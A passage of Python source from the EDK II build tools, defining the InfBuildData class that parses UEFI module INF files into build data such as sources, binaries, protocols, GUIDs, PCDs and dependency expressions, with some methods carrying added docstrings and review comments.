MODEL_PCD_DYNAMIC_VPD : TAB_PCDS_DYNAMIC_VPD,
MODEL_PCD_DYNAMIC_EX : TAB_PCDS_DYNAMIC_EX,
MODEL_PCD_DYNAMIC_EX_DEFAULT : TAB_PCDS_DYNAMIC_EX,
MODEL_PCD_DYNAMIC_EX_HII : TAB_PCDS_DYNAMIC_EX_HII,
MODEL_PCD_DYNAMIC_EX_VPD : TAB_PCDS_DYNAMIC_EX_VPD,
}
# dict used to convert part of [Defines] to members of InfBuildData directly
_PROPERTY_ = {
#
# Required Fields
#
TAB_INF_DEFINES_BASE_NAME : "_BaseName",
TAB_INF_DEFINES_FILE_GUID : "_Guid",
TAB_INF_DEFINES_MODULE_TYPE : "_ModuleType",
#
# Optional Fields
#
# TAB_INF_DEFINES_INF_VERSION : "_AutoGenVersion",
TAB_INF_DEFINES_COMPONENT_TYPE : "_ComponentType",
TAB_INF_DEFINES_MAKEFILE_NAME : "_MakefileName",
# TAB_INF_DEFINES_CUSTOM_MAKEFILE : "_CustomMakefile",
TAB_INF_DEFINES_DPX_SOURCE :"_DxsFile",
TAB_INF_DEFINES_VERSION_NUMBER : "_Version",
TAB_INF_DEFINES_VERSION_STRING : "_Version",
TAB_INF_DEFINES_VERSION : "_Version",
TAB_INF_DEFINES_PCD_IS_DRIVER : "_PcdIsDriver",
TAB_INF_DEFINES_SHADOW : "_Shadow"
}
# regular expression for converting XXX_FLAGS in [nmake] section to new type
_NMAKE_FLAG_PATTERN_ = re.compile("(?:EBC_)?([A-Z]+)_(?:STD_|PROJ_|ARCH_)?FLAGS(?:_DLL|_ASL|_EXE)?", re.UNICODE)
# dict used to convert old tool name used in [nmake] section to new ones
_TOOL_CODE_ = {
"C" : "CC",
BINARY_FILE_TYPE_LIB : "SLINK",
"LINK" : "DLINK",
}
## Constructor of InfBuildData
#
# Initialize object of InfBuildData
#
# @param FilePath The path of platform description file
# @param RawData The raw data of DSC file
# @param BuildDataBase Database used to retrieve module/package information
# @param Arch The target architecture
# @param Platform The name of platform employing this module
# @param Macros Macros used for replacement in DSC file
#
def __init__(self, FilePath, RawData, BuildDatabase, Arch=TAB_ARCH_COMMON, Target=None, Toolchain=None):
self.MetaFile = FilePath
self._ModuleDir = FilePath.Dir
self._RawData = RawData
self._Bdb = BuildDatabase
self._Arch = Arch
self._Target = Target
self._Toolchain = Toolchain
self._Platform = TAB_COMMON
self._TailComments = None
self._BaseName = None
self._DxsFile = None
self._ModuleType = None
self._ComponentType = None
self._BuildType = None
self._Guid = None
self._Version = None
self._PcdIsDriver = None
self._BinaryModule = None
self._Shadow = None
self._MakefileName = None
self._CustomMakefile = None
self._Specification = None
self._LibraryClass = None
self._ModuleEntryPointList = None
self._ModuleUnloadImageList = None
self._ConstructorList = None
self._DestructorList = None
self._Defs = OrderedDict()
self._ProtocolComments = None
self._PpiComments = None
self._GuidsUsedByPcd = OrderedDict()
self._GuidComments = None
self._PcdComments = None
self._BuildOptions = None
self._DependencyFileList = None
self.LibInstances = []
self.ReferenceModules = set()
def SetReferenceModule(self,Module):
self.ReferenceModules.add(Module)
return self
## XXX[key] = value
def __setitem__(self, key, value):
self.__dict__[self._PROPERTY_[key]] = value
## value = XXX[key]
def __getitem__(self, key):
return self.__dict__[self._PROPERTY_[key]]
## "in" test support
def __contains__(self, key):
return key in self._PROPERTY_
## Get current effective macros
@cached_property
def _Macros(self):
RetVal = {}
return RetVal
## Get architecture
@cached_property
def Arch(self):
return self._Arch
## Return the name of platform employing this module
@cached_property
def Platform(self):
return self._Platform
@cached_property
def HeaderComments(self):
return [a[0] for a in self._RawData[MODEL_META_DATA_HEADER_COMMENT]]
@cached_property
def TailComments(self):
return [a[0] for a in self._RawData[MODEL_META_DATA_TAIL_COMMENT]]
## Retrieve all information in [Defines] section
#
# (Retrieving all [Defines] information in one-shot is just to save time.)
#
@cached_class_function
def _GetHeaderInfo(self):
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch, self._Platform]
for Record in RecordList:
Name, Value = Record[1], ReplaceMacro(Record[2], self._Macros, False)
# items defined _PROPERTY_ don't need additional processing
if Name in self:
self[Name] = Value
self._Defs[Name] = Value
self._Macros[Name] = Value
# some special items in [Defines] section need special treatment
elif Name in ('EFI_SPECIFICATION_VERSION', 'UEFI_SPECIFICATION_VERSION', 'EDK_RELEASE_VERSION', 'PI_SPECIFICATION_VERSION'):
if Name in ('EFI_SPECIFICATION_VERSION', 'UEFI_SPECIFICATION_VERSION'):
Name = 'UEFI_SPECIFICATION_VERSION'
if self._Specification is None:
self._Specification = OrderedDict()
self._Specification[Name] = GetHexVerValue(Value)
if self._Specification[Name] is None:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED,
"'%s' format is not supported for %s" % (Value, Name),
File=self.MetaFile, Line=Record[-1])
elif Name == 'LIBRARY_CLASS':
if self._LibraryClass is None:
self._LibraryClass = []
ValueList = GetSplitValueList(Value)
LibraryClass = ValueList[0]
if len(ValueList) > 1:
SupModuleList = GetSplitValueList(ValueList[1], ' ')
else:
SupModuleList = SUP_MODULE_LIST
self._LibraryClass.append(LibraryClassObject(LibraryClass, SupModuleList))
elif Name == 'ENTRY_POINT':
if self._ModuleEntryPointList is None:
self._ModuleEntryPointList = []
self._ModuleEntryPointList.append(Value)
elif Name == 'UNLOAD_IMAGE':
if self._ModuleUnloadImageList is None:
self._ModuleUnloadImageList = []
if not Value:
continue
self._ModuleUnloadImageList.append(Value)
elif Name == 'CONSTRUCTOR':
if self._ConstructorList is None:
self._ConstructorList = []
if not Value:
continue
self._ConstructorList.append(Value)
elif Name == 'DESTRUCTOR':
if self._DestructorList is None:
self._DestructorList = []
if not Value:
continue
self._DestructorList.append(Value)
elif Name == TAB_INF_DEFINES_CUSTOM_MAKEFILE:
TokenList = GetSplitValueList(Value)
if self._CustomMakefile is None:
self._CustomMakefile = {}
if len(TokenList) < 2:
self._CustomMakefile[TAB_COMPILER_MSFT] = TokenList[0]
self._CustomMakefile['GCC'] = TokenList[0]
else:
if TokenList[0] not in [TAB_COMPILER_MSFT, 'GCC']:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED,
"No supported family [%s]" % TokenList[0],
File=self.MetaFile, Line=Record[-1])
self._CustomMakefile[TokenList[0]] = TokenList[1]
else:
self._Defs[Name] = Value
self._Macros[Name] = Value
#
# Retrieve information in sections specific to Edk.x modules
#
if not self._ModuleType:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE,
"MODULE_TYPE is not given", File=self.MetaFile)
if self._ModuleType not in SUP_MODULE_LIST:
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch, self._Platform]
for Record in RecordList:
Name = Record[1]
if Name == "MODULE_TYPE":
LineNo = Record[6]
break
EdkLogger.error("build", FORMAT_NOT_SUPPORTED,
"MODULE_TYPE %s is not supported for EDK II, valid values are:\n %s" % (self._ModuleType, ' '.join(l for l in SUP_MODULE_LIST)),
File=self.MetaFile, Line=LineNo)
if (self._Specification is None) or (not 'PI_SPECIFICATION_VERSION' in self._Specification) or (int(self._Specification['PI_SPECIFICATION_VERSION'], 16) < 0x0001000A):
if self._ModuleType == SUP_MODULE_SMM_CORE:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "SMM_CORE module type can't be used in the module with PI_SPECIFICATION_VERSION less than 0x0001000A", File=self.MetaFile)
if (self._Specification is None) or (not 'PI_SPECIFICATION_VERSION' in self._Specification) or (int(self._Specification['PI_SPECIFICATION_VERSION'], 16) < 0x00010032):
if self._ModuleType == SUP_MODULE_MM_CORE_STANDALONE:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "MM_CORE_STANDALONE module type can't be used in the module with PI_SPECIFICATION_VERSION less than 0x00010032", File=self.MetaFile)
if self._ModuleType == SUP_MODULE_MM_STANDALONE:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "MM_STANDALONE module type can't be used in the module with PI_SPECIFICATION_VERSION less than 0x00010032", File=self.MetaFile)
if 'PCI_DEVICE_ID' in self._Defs and 'PCI_VENDOR_ID' in self._Defs \
and 'PCI_CLASS_CODE' in self._Defs and 'PCI_REVISION' in self._Defs:
self._BuildType = 'UEFI_OPTIONROM'
if 'PCI_COMPRESS' in self._Defs:
if self._Defs['PCI_COMPRESS'] not in ('TRUE', 'FALSE'):
EdkLogger.error("build", FORMAT_INVALID, "Expected TRUE/FALSE for PCI_COMPRESS: %s" % self.MetaFile)
elif 'UEFI_HII_RESOURCE_SECTION' in self._Defs \
and self._Defs['UEFI_HII_RESOURCE_SECTION'] == 'TRUE':
self._BuildType = 'UEFI_HII'
else:
self._BuildType = self._ModuleType.upper()
if self._DxsFile:
File = PathClass(NormPath(self._DxsFile), self._ModuleDir, Arch=self._Arch)
# check the file validation
ErrorCode, ErrorInfo = File.Validate(".dxs", CaseSensitive=False)
if ErrorCode != 0:
EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo,
File=self.MetaFile, Line=LineNo)
if not self._DependencyFileList:
self._DependencyFileList = []
self._DependencyFileList.append(File)
## Retrieve file version
@cached_property
def AutoGenVersion(self):
RetVal = 0x00010000
RecordList = self._RawData[MODEL_META_DATA_HEADER, self._Arch, self._Platform]
for Record in RecordList:
if Record[1] == TAB_INF_DEFINES_INF_VERSION:
if '.' in Record[2]:
ValueList = Record[2].split('.')
Major = '%04o' % int(ValueList[0], 0)
Minor = '%04o' % int(ValueList[1], 0)
RetVal = int('0x' + Major + Minor, 0)
else:
RetVal = int(Record[2], 0)
break
return RetVal
## Retrieve BASE_NAME
@cached_property
def BaseName(self):
if self._BaseName is None:
self._GetHeaderInfo()
if self._BaseName is None:
EdkLogger.error('build', ATTRIBUTE_NOT_AVAILABLE, "No BASE_NAME name", File=self.MetaFile)
return self._BaseName
## Retrieve DxsFile
@cached_property
def DxsFile(self):
if self._DxsFile is None:
self._GetHeaderInfo()
if self._DxsFile is None:
self._DxsFile = ''
return self._DxsFile
## Retrieve MODULE_TYPE
@cached_property
def ModuleType(self):
if self._ModuleType is None:
self._GetHeaderInfo()
if self._ModuleType is None:
self._ModuleType = SUP_MODULE_BASE
if self._ModuleType not in SUP_MODULE_LIST:
self._ModuleType = SUP_MODULE_USER_DEFINED
return self._ModuleType
## Retrieve COMPONENT_TYPE
@cached_property
def ComponentType(self):
if self._ComponentType is None:
self._GetHeaderInfo()
if self._ComponentType is None:
self._ComponentType = SUP_MODULE_USER_DEFINED
return self._ComponentType
## Retrieve "BUILD_TYPE"
@cached_property
def BuildType(self):
if self._BuildType is None:
self._GetHeaderInfo()
if not self._BuildType:
self._BuildType = SUP_MODULE_BASE
return self._BuildType
## Retrieve file guid
@cached_property
def Guid(self):
if self._Guid is None:
self._GetHeaderInfo()
if self._Guid is None:
self._Guid = '00000000-0000-0000-0000-000000000000'
return self._Guid
## Retrieve module version
@cached_property
def Version(self):
if self._Version is None:
self._GetHeaderInfo()
if self._Version is None:
self._Version = '0.0'
return self._Version
## Retrieve PCD_IS_DRIVER
@cached_property
def PcdIsDriver(self):
if self._PcdIsDriver is None:
self._GetHeaderInfo()
if self._PcdIsDriver is None:
self._PcdIsDriver = ''
return self._PcdIsDriver
## Retrieve SHADOW
@cached_property
def Shadow(self):
if self._Shadow is None:
self._GetHeaderInfo()
if self._Shadow and self._Shadow.upper() == 'TRUE':
self._Shadow = True
else:
self._Shadow = False
return self._Shadow
## Retrieve CUSTOM_MAKEFILE
@cached_property
def CustomMakefile(self):
if self._CustomMakefile is None:
self._GetHeaderInfo()
if self._CustomMakefile is None:
self._CustomMakefile = {}
return self._CustomMakefile
## Retrieve EFI_SPECIFICATION_VERSION
@cached_property
def Specification(self):
if self._Specification is None:
self._GetHeaderInfo()
if self._Specification is None:
self._Specification = {}
return self._Specification
## Retrieve LIBRARY_CLASS
@cached_property
def LibraryClass(self):
if self._LibraryClass is None:
self._GetHeaderInfo()
if self._LibraryClass is None:
self._LibraryClass = []
return self._LibraryClass
## Retrieve ENTRY_POINT
@cached_property
def ModuleEntryPointList(self):
if self._ModuleEntryPointList is None:
self._GetHeaderInfo()
if self._ModuleEntryPointList is None:
self._ModuleEntryPointList = []
return self._ModuleEntryPointList
## Retrieve UNLOAD_IMAGE
@cached_property
def ModuleUnloadImageList(self):
if self._ModuleUnloadImageList is None:
self._GetHeaderInfo()
if self._ModuleUnloadImageList is None:
self._ModuleUnloadImageList = []
return self._ModuleUnloadImageList
## Retrieve CONSTRUCTOR
@cached_property
def ConstructorList(self):
if self._ConstructorList is None:
self._GetHeaderInfo()
if self._ConstructorList is None:
self._ConstructorList = []
return self._ConstructorList
## Retrieve DESTRUCTOR
@cached_property
def DestructorList(self):
if self._DestructorList is None:
self._GetHeaderInfo()
if self._DestructorList is None:
self._DestructorList = []
return self._DestructorList
    ## Retrieve defines other than the ones with dedicated properties
    @cached_property
    def Defines(self):
        """Return the raw [Defines] dictionary collected by _GetHeaderInfo."""
        self._GetHeaderInfo()
        return self._Defs
    ## Retrieve binary files
    @cached_class_function
    def _GetBinaries(self):
        """Collect and validate the files listed in the [Binaries] section.

        Each record carries (FileType, Path, "Target[|...]", ..., LineNo); the
        path is macro-expanded relative to the module directory and must exist
        on disk, otherwise a fatal build error is raised.
        """
        RetVal = []
        RecordList = self._RawData[MODEL_EFI_BINARY_FILE, self._Arch, self._Platform]
        Macros = self._Macros
        Macros['PROCESSOR'] = self._Arch
        for Record in RecordList:
            FileType = Record[0]
            LineNo = Record[-1]
            Target = TAB_COMMON
            FeatureFlag = []
            if Record[2]:
                TokenList = GetSplitValueList(Record[2], TAB_VALUE_SPLIT)
                if TokenList:
                    Target = TokenList[0]
                if len(TokenList) > 1:
                    # NOTE(review): FeatureFlag is assigned but never used
                    # below; looks vestigial -- confirm before removing.
                    FeatureFlag = Record[1:]
            File = PathClass(NormPath(Record[1], Macros), self._ModuleDir, '', FileType, True, self._Arch, '', Target)
            # check the file validation
            ErrorCode, ErrorInfo = File.Validate()
            if ErrorCode != 0:
                EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo, File=self.MetaFile, Line=LineNo)
            RetVal.append(File)
        return RetVal
## Retrieve binary files with error check.
@cached_property
def Binaries(self):
RetVal = self._GetBinaries()
if GlobalData.gIgnoreSource and not RetVal:
ErrorInfo = "The INF file does not contain any RetVal to use in creating the image\n"
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE, ExtraData=ErrorInfo, File=self.MetaFile)
return RetVal
    ## Retrieve source files
    @cached_property
    def Sources(self):
        """Return validated [Sources] entries as PathClass objects.

        Returns [] in a binary build (GlobalData.gIgnoreSource).  Dependency
        files discovered while parsing the header (e.g. a DXS file) are
        appended to the result.
        """
        self._GetHeaderInfo()
        # Ignore all source files in a binary build mode
        if GlobalData.gIgnoreSource:
            return []
        RetVal = []
        RecordList = self._RawData[MODEL_EFI_SOURCE_FILE, self._Arch, self._Platform]
        Macros = self._Macros
        for Record in RecordList:
            LineNo = Record[-1]
            ToolChainFamily = Record[1]
            TagName = Record[2]
            ToolCode = Record[3]
            File = PathClass(NormPath(Record[0], Macros), self._ModuleDir, '',
                             '', False, self._Arch, ToolChainFamily, '', TagName, ToolCode)
            # check the file validation
            ErrorCode, ErrorInfo = File.Validate()
            if ErrorCode != 0:
                EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo, File=self.MetaFile, Line=LineNo)
            RetVal.append(File)
        # add any previously found dependency files to the source list
        if self._DependencyFileList:
            RetVal.extend(self._DependencyFileList)
        return RetVal
## Retrieve library classes employed by this module
@cached_property
def LibraryClasses(self):
RetVal = OrderedDict()
RecordList = self._RawData[MODEL_EFI_LIBRARY_CLASS, self._Arch, self._Platform]
for Record in RecordList:
Lib = Record[0]
Instance = Record[1]
if Instance:
Instance = NormPath(Instance, self._Macros)
RetVal[Lib] = Instance
else:
RetVal[Lib] = None
return RetVal
## Retrieve library names (for Edk.x style of modules)
@cached_property
def Libraries(self):
RetVal = []
RecordList = self._RawData[MODEL_EFI_LIBRARY_INSTANCE, self._Arch, self._Platform]
for Record in RecordList:
LibraryName = ReplaceMacro(Record[0], self._Macros, False)
# in case of name with '.lib' extension, which is unusual in Edk.x inf
LibraryName = os.path.splitext(LibraryName)[0]
if LibraryName not in RetVal:
RetVal.append(LibraryName)
return RetVal
    @cached_property
    def ProtocolComments(self):
        """Per-protocol comment lists; populated as a side effect of Protocols."""
        # Touch the property so the comment map is filled before returning it.
        self.Protocols
        return self._ProtocolComments
## Retrieve protocols consumed/produced by this module
@cached_property
def Protocols(self):
RetVal = OrderedDict()
self._ProtocolComments = OrderedDict()
RecordList = self._RawData[MODEL_EFI_PROTOCOL, self._Arch, self._Platform]
for Record in RecordList:
CName = Record[0]
Value = _ProtocolValue(CName, self.Packages, self.MetaFile.Path)
if Value is None:
PackageList = "\n\t".join(str(P) for P in self.Packages)
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
"Value of Protocol [%s] is not found under [Protocols] section in" % CName,
ExtraData=PackageList, File=self.MetaFile, Line=Record[-1])
RetVal[CName] = Value
CommentRecords = self._RawData[MODEL_META_DATA_COMMENT, self._Arch, self._Platform, Record[5]]
self._ProtocolComments[CName] = [a[0] for a in CommentRecords]
return RetVal
    @cached_property
    def PpiComments(self):
        """Per-PPI comment lists; populated as a side effect of Ppis."""
        # Touch the property so the comment map is filled before returning it.
        self.Ppis
        return self._PpiComments
## Retrieve PPIs consumed/produced by this module
@cached_property
def Ppis(self):
RetVal = OrderedDict()
self._PpiComments = OrderedDict()
RecordList = self._RawData[MODEL_EFI_PPI, self._Arch, self._Platform]
for Record in RecordList:
CName = Record[0]
Value = _PpiValue(CName, self.Packages, self.MetaFile.Path)
if Value is None:
PackageList = "\n\t".join(str(P) for P in self.Packages)
EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
"Value of PPI [%s] is not found under [Ppis] section in " % CName,
ExtraData=PackageList, File=self.MetaFile, Line=Record[-1])
RetVal[CName] = Value
CommentRecords = self._RawData[MODEL_META_DATA_COMMENT, self._Arch, self._Platform, Record[5]]
self._PpiComments[CName] = [a[0] for a in CommentRecords]
return RetVal
    @cached_property
    def GuidComments(self):
        """Per-GUID comment lists; populated as a side effect of Guids."""
        # Touch the property so the comment map is filled before returning it.
        self.Guids
        return self._GuidComments
    ## Retrieve GUIDs consumed/produced by this module
    @cached_property
    def Guids(self):
        """Resolve every GUID C name used by this module to its registry value.

        Covers the [Guids] section plus the token-space GUIDs of all PCD
        sections.  Side effects: fills _GuidComments (per-GUID comments) and
        _GuidsUsedByPcd (GUIDs referenced only through PCDs).
        """
        RetVal = OrderedDict()
        self._GuidComments = OrderedDict()
        RecordList = self._RawData[MODEL_EFI_GUID, self._Arch, self._Platform]
        for Record in RecordList:
            CName = Record[0]
            Value = GuidValue(CName, self.Packages, self.MetaFile.Path)
            if Value is None:
                # The GUID must be declared by one of the dependent packages.
                PackageList = "\n\t".join(str(P) for P in self.Packages)
                EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
                                "Value of Guid [%s] is not found under [Guids] section in" % CName,
                                ExtraData=PackageList, File=self.MetaFile, Line=Record[-1])
            RetVal[CName] = Value
            CommentRecords = self._RawData[MODEL_META_DATA_COMMENT, self._Arch, self._Platform, Record[5]]
            self._GuidComments[CName] = [a[0] for a in CommentRecords]
        # Token-space GUIDs referenced by PCD sections also need values.
        for Type in [MODEL_PCD_FIXED_AT_BUILD,MODEL_PCD_PATCHABLE_IN_MODULE,MODEL_PCD_FEATURE_FLAG,MODEL_PCD_DYNAMIC,MODEL_PCD_DYNAMIC_EX]:
            RecordList = self._RawData[Type, self._Arch, self._Platform]
            for TokenSpaceGuid, _, _, _, _, _, LineNo in RecordList:
                # get the guid value
                if TokenSpaceGuid not in RetVal:
                    Value = GuidValue(TokenSpaceGuid, self.Packages, self.MetaFile.Path)
                    if Value is None:
                        PackageList = "\n\t".join(str(P) for P in self.Packages)
                        EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
                                        "Value of Guid [%s] is not found under [Guids] section in" % TokenSpaceGuid,
                                        ExtraData=PackageList, File=self.MetaFile, Line=LineNo)
                    RetVal[TokenSpaceGuid] = Value
                    self._GuidsUsedByPcd[TokenSpaceGuid] = Value
        return RetVal
## Retrieve include paths necessary for this module (for Edk.x style of modules)
@cached_property
def Includes(self):
RetVal = []
Macros = self._Macros
Macros['PROCESSOR'] = GlobalData.gEdkGlobal.get('PROCESSOR', self._Arch)
RecordList = self._RawData[MODEL_EFI_INCLUDE, self._Arch, self._Platform]
for Record in RecordList:
File = NormPath(Record[0], Macros)
if File[0] == '.':
File = os.path.join(self._ModuleDir, File)
else:
File = mws.join(GlobalData.gWorkspace, File)
File = RealPath(os.path.normpath(File))
if File:
RetVal.append(File)
return RetVal
## Retrieve packages this module depends on
@cached_property
def Packages(self):
RetVal = []
RecordList = self._RawData[MODEL_META_DATA_PACKAGE, self._Arch, self._Platform]
Macros = self._Macros
for Record in RecordList:
File = PathClass(NormPath(Record[0], Macros), GlobalData.gWorkspace, Arch=self._Arch)
# check the file validation
ErrorCode, ErrorInfo = File.Validate('.dec')
if ErrorCode != 0:
LineNo = Record[-1]
EdkLogger.error('build', ErrorCode, ExtraData=ErrorInfo, File=self.MetaFile, Line=LineNo)
# parse this package now. we need it to get protocol/ppi/guid value
RetVal.append(self._Bdb[File, self._Arch, self._Target, self._Toolchain])
return RetVal
    ## Retrieve PCD comments
    @cached_property
    def PcdComments(self):
        """Per-PCD comment lists; populated as a side effect of Pcds."""
        # Touch the property so the comment map is filled before returning it.
        self.Pcds
        return self._PcdComments
## Retrieve PCDs used in this module
@cached_property
def Pcds(self):
self._PcdComments = OrderedDict()
RetVal = OrderedDict()
RetVal.update(self._GetPcd(MODEL_PCD_FIXED_AT_BUILD))
RetVal.update(self._GetPcd(MODEL_PCD_PATCHABLE_IN_MODULE))
RetVal.update(self._GetPcd(MODEL_PCD_FEATURE_FLAG))
RetVal.update(self._GetPcd(MODEL_PCD_DYNAMIC))
RetVal.update(self._GetPcd(MODEL_PCD_DYNAMIC_EX))
return RetVal
@cached_property
def ModulePcdList(self):
RetVal = self.Pcds
return RetVal
@cached_property
def LibraryPcdList(self):
if bool(self.LibraryClass):
return []
RetVal = {}
Pcds = set()
for Library in self.LibInstances:
PcdsInLibrary = OrderedDict()
for Key in Library.Pcds:
if Key in self.Pcds or Key in Pcds:
continue
Pcds.add(Key)
PcdsInLibrary[Key] = copy.copy(Library.Pcds[Key])
RetVal[Library] = PcdsInLibrary
return RetVal
@cached_property
def PcdsName(self):
PcdsName = set()
for Type in (MODEL_PCD_FIXED_AT_BUILD,MODEL_PCD_PATCHABLE_IN_MODULE,MODEL_PCD_FEATURE_FLAG,MODEL_PCD_DYNAMIC,MODEL_PCD_DYNAMIC_EX):
RecordList = self._RawData[Type, self._Arch, self._Platform]
for TokenSpaceGuid, PcdCName, _, _, _, _, _ in RecordList:
PcdsName.add((PcdCName, TokenSpaceGuid))
return PcdsName
## Retrieve build options specific to this module
@cached_property
def BuildOptions(self):
if self._BuildOptions is None:
self._BuildOptions = OrderedDict()
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch, self._Platform]
for Record in RecordList:
ToolChainFamily = Record[0]
ToolChain = Record[1]
Option = Record[2]
if (ToolChainFamily, ToolChain) not in self._BuildOptions or Option.startswith('='):
self._BuildOptions[ToolChainFamily, ToolChain] = Option
else:
# concatenate the option string if they're for the same tool
OptionString = self._BuildOptions[ToolChainFamily, ToolChain]
self._BuildOptions[ToolChainFamily, ToolChain] = OptionString + " " + Option
return self._BuildOptions
    ## Retrieve dependency expression
    @cached_property
    def Depex(self):
        """Tokenize the [Depex] section into {(Arch, ModuleType): token list}.

        Tokens may be depex opcodes, module INF paths (replaced by the module
        GUID), fixed VOID* PCD names, or protocol/PPI/GUID C names (replaced
        by their registry values).  Driver module types without a [Depex]
        section raise a fatal build error.
        """
        RetVal = tdict(False, 2)
        # If the module has only Binaries and no Sources, then ignore [Depex]
        if not self.Sources and self.Binaries:
            return RetVal
        RecordList = self._RawData[MODEL_EFI_DEPEX, self._Arch]
        # PEIM and DXE drivers must have a valid [Depex] section
        if len(self.LibraryClass) == 0 and len(RecordList) == 0:
            if self.ModuleType == SUP_MODULE_DXE_DRIVER or self.ModuleType == SUP_MODULE_PEIM or self.ModuleType == SUP_MODULE_DXE_SMM_DRIVER or \
                self.ModuleType == SUP_MODULE_DXE_SAL_DRIVER or self.ModuleType == SUP_MODULE_DXE_RUNTIME_DRIVER:
                EdkLogger.error('build', RESOURCE_NOT_AVAILABLE, "No [Depex] section or no valid expression in [Depex] section for [%s] module" \
                                % self.ModuleType, File=self.MetaFile)
        # USER_DEFINED/HOST_APPLICATION depex records must state a module type.
        if len(RecordList) != 0 and (self.ModuleType == SUP_MODULE_USER_DEFINED or self.ModuleType == SUP_MODULE_HOST_APPLICATION):
            for Record in RecordList:
                if Record[4] not in [SUP_MODULE_PEIM, SUP_MODULE_DXE_DRIVER, SUP_MODULE_DXE_SMM_DRIVER]:
                    EdkLogger.error('build', FORMAT_INVALID,
                                    "'%s' module must specify the type of [Depex] section" % self.ModuleType,
                                    File=self.MetaFile)
        TemporaryDictionary = OrderedDict()
        for Record in RecordList:
            DepexStr = ReplaceMacro(Record[0], self._Macros, False)
            Arch = Record[3]
            ModuleType = Record[4]
            TokenList = DepexStr.split()
            if (Arch, ModuleType) not in TemporaryDictionary:
                TemporaryDictionary[Arch, ModuleType] = []
            DepexList = TemporaryDictionary[Arch, ModuleType]
            for Token in TokenList:
                if Token in DEPEX_SUPPORTED_OPCODE_SET:
                    DepexList.append(Token)
                elif Token.endswith(".inf"): # module file name
                    ModuleFile = os.path.normpath(Token)
                    Module = self.BuildDatabase[ModuleFile]
                    if Module is None:
                        EdkLogger.error('build', RESOURCE_NOT_AVAILABLE, "Module is not found in active platform",
                                        ExtraData=Token, File=self.MetaFile, Line=Record[-1])
                    DepexList.append(Module.Guid)
                else:
                    # it use the Fixed PCD format
                    if '.' in Token:
                        if tuple(Token.split('.')[::-1]) not in self.Pcds:
                            EdkLogger.error('build', RESOURCE_NOT_AVAILABLE, "PCD [{}] used in [Depex] section should be listed in module PCD section".format(Token), File=self.MetaFile, Line=Record[-1])
                        else:
                            if self.Pcds[tuple(Token.split('.')[::-1])].DatumType != TAB_VOID:
                                EdkLogger.error('build', FORMAT_INVALID, "PCD [{}] used in [Depex] section should be VOID* datum type".format(Token), File=self.MetaFile, Line=Record[-1])
                        Value = Token
                    else:
                        # get the GUID value now
                        Value = _ProtocolValue(Token, self.Packages, self.MetaFile.Path)
                        if Value is None:
                            Value = _PpiValue(Token, self.Packages, self.MetaFile.Path)
                            if Value is None:
                                Value = GuidValue(Token, self.Packages, self.MetaFile.Path)
                        if Value is None:
                            PackageList = "\n\t".join(str(P) for P in self.Packages)
                            EdkLogger.error('build', RESOURCE_NOT_AVAILABLE,
                                            "Value of [%s] is not found in" % Token,
                                            ExtraData=PackageList, File=self.MetaFile, Line=Record[-1])
                        DepexList.append(Value)
        for Arch, ModuleType in TemporaryDictionary:
            RetVal[Arch, ModuleType] = TemporaryDictionary[Arch, ModuleType]
        return RetVal
## Retrieve dependency expression
@cached_property
def DepexExpression(self):
RetVal = tdict(False, 2)
RecordList = self._RawData[MODEL_EFI_DEPEX, self._Arch]
TemporaryDictionary = OrderedDict()
for Record in RecordList:
DepexStr = ReplaceMacro(Record[0], self._Macros, False)
Arch = Record[3]
ModuleType = Record[4]
TokenList = DepexStr.split()
if (Arch, ModuleType) not in TemporaryDictionary:
TemporaryDictionary[Arch, ModuleType] = ''
for Token in TokenList:
TemporaryDictionary[Arch, ModuleType] = TemporaryDictionary[Arch, ModuleType] + Token.strip() + ' '
for Arch, ModuleType in TemporaryDictionary:
RetVal[Arch, ModuleType] = TemporaryDictionary[Arch, ModuleType]
return RetVal
    def LocalPkg(self):
        """Return the workspace-relative path of a DEC file in this module's
        top-level package directory, or None when no such file exists.

        Walks up from the module INF path to the top directory under
        MetaFile.Root, then scans that directory for a DEC file.
        """
        module_path = self.MetaFile.File
        subdir = os.path.split(module_path)[0]
        TopDir = ""
        while subdir:
            subdir,TopDir = os.path.split(subdir)
        for file_name in os.listdir(os.path.join(self.MetaFile.Root,TopDir)):
            # NOTE(review): endswith("DEC") also matches names like "xdec"
            # without a dot separator -- confirm ".DEC" was intended.
            if file_name.upper().endswith("DEC"):
                pkg = os.path.join(TopDir,file_name)
                return pkg
    @cached_class_function
    def GetGuidsUsedByPcd(self):
        """Return the token-space GUIDs referenced only via PCD sections."""
        # NOTE(review): _GuidsUsedByPcd is filled by the Guids property, but
        # this touches self.Guid (the FILE_GUID) -- confirm self.Guids was
        # not intended here.
        self.Guid
        return self._GuidsUsedByPcd
    ## Retrieve PCD for given type
    def _GetPcd(self, Type):
        """Build {(PcdCName, TokenSpaceGuid): PcdClassObject} for one PCD access type.

        INF settings are cross-checked against the declaring DEC package:
        'Dynamic' PCDs get their concrete type resolved, token values are
        validated (hex or 32-bit decimal), and the default value is evaluated.
        Side effect: fills self._PcdComments with per-PCD comment lists.
        """
        Pcds = OrderedDict()
        PcdDict = tdict(True, 4)
        PcdList = []
        RecordList = self._RawData[Type, self._Arch, self._Platform]
        # First pass: index settings by (Arch, Platform, CName, TokenSpace)
        # and capture attached comments.
        for TokenSpaceGuid, PcdCName, Setting, Arch, Platform, Id, LineNo in RecordList:
            PcdDict[Arch, Platform, PcdCName, TokenSpaceGuid] = (Setting, LineNo)
            PcdList.append((PcdCName, TokenSpaceGuid))
            CommentRecords = self._RawData[MODEL_META_DATA_COMMENT, self._Arch, self._Platform, Id]
            Comments = []
            for CmtRec in CommentRecords:
                Comments.append(CmtRec[0])
